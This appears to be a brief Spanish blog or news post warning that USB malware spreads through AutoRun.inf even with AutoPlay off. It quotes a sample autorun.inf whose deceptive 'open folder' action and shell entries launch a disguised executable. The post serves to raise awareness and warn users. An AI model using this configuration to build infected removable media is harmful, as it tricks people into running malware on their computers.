Actualidad

Hasta hace poco la forma más fácil de evitar que nos infectáramos con malware que pudiera estar en un pendrive era desactivar el AutoPlay de windows, esto hacia que no se ejecutara ningún autorun maligno en nuestro pc, y digo hasta hace poco porque los del lado oscuro vuelven a la carga, y esta vez le dan una vuelta de tuerca a la forma de propagarse por nuestros queridos dispositivos de almacenamiento (iPods y otros MP3 players, memorias flash, pendrives USB, cámaras digitales y portarretratos digitales y otros).

Ahora usan ActionKey en los AutoRun.Inf, con ello consiguen que al ejecutar Abrir la Carpeta para ver los archivos se ejecute el bichito.

Ejemplo de código en autorun:

[autorun]

:jmpO

open=winamp_cache_001/ehtumbs.exe

:nop

icon=%system%\SHELL32.dll,4

; (garbage characters)

action=abrir carpeta usando explorer de windows

; (garbage characters)

shell\\\\\open\\\\\winamp_cache_001/ehtumbs.exe

shell\\\\\explore\\\\\winamp_cache_001/ehtumbs.exe

useautoplay=1

[AutoRun]

; (garbage characters)

:GOTO NUL

Bueno chicos a tener cuidado y extremar las precauciones.

Un saludo.